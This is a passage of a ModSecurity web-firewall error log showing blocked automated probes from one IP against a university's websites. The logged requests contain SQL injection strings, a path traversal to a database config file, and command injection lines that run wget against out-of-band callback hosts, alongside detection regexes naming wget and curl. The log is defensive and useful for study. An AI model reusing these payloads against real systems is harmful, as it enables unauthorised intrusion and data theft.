"journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATVtSUAAAAZ"]
[Tue Aug 29 11:34:51.612725 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATZp6UAAAAf"]
[Tue Aug 29 11:34:51.938073 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUZcFYAAABO"]
[Tue Aug 29 11:34:51.939237 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAATlLEwAAAAq"]
[Tue Aug 29 11:34:51.941479 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUXLjAAAABM"]
[Tue Aug 29 11:34:51.943713 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUdm34AAABS"]
[Tue Aug 29 11:34:51.944287 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUTiXoAAABJ"]
[Tue Aug 29 11:34:52.303664 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAATWYRYAAAAa"]
[Tue Aug 29 11:34:52.318962 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATPtR4AAAAM"]
[Tue Aug 29 11:34:52.319426 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAAUFdfIAAAA9"]
[Tue Aug 29 11:34:52.320371 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATZp6YAAAAf"]
[Tue Aug 29 11:34:52.320946 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASOUpIAAAAR"]
[Tue Aug 29 11:34:52.321427 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASHh8wAAAAD"]
[Tue Aug 29 11:34:53.318522 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlguj9ncjn4o5tyt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATus1UAAAAv"]
[Tue Aug 29 11:34:53.325391 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATPtSAAAAAM"]
[Tue Aug 29 11:34:53.348720 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgiom6so5naf5gt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATlLFEAAAAq"]
[Tue Aug 29 11:34:53.352062 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAT@Kv0AAAA2"]
[Tue Aug 29 11:34:53.352525 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUDQTMAAAA7"]
[Tue Aug 29 11:34:53.360799 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAARjjXEAAAAL"]
[Tue Aug 29 11:34:53.367095 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAATVtScAAAAZ"]
[Tue Aug 29 11:34:53.369717 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUbg08AAABQ"]
[Tue Aug 29 11:34:53.370433 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg5afgjw4eqkphz.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAAUTiXwAAABJ"]
[Tue Aug 29 11:34:53.377484 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUR84EAAABI"]
[Tue Aug 29 11:34:53.379340 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATUxRIAAAAW"]
[Tue Aug 29 11:34:53.382976 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUNakkAAABF"]
[Tue Aug 29 11:34:53.385038 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAULx8QAAABD"]
[Tue Aug 29 11:34:53.387004 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgsxr57wu3q9u9z.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATQXhkAAAAO"]
[Tue Aug 29 11:34:54.315215 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bsCo-f0AAATPtSIAAAAM"]
[Tue Aug 29 11:34:54.318962 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgctuuid1o4br5s.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bsCo-f0AAATmZd4AAAAr"]
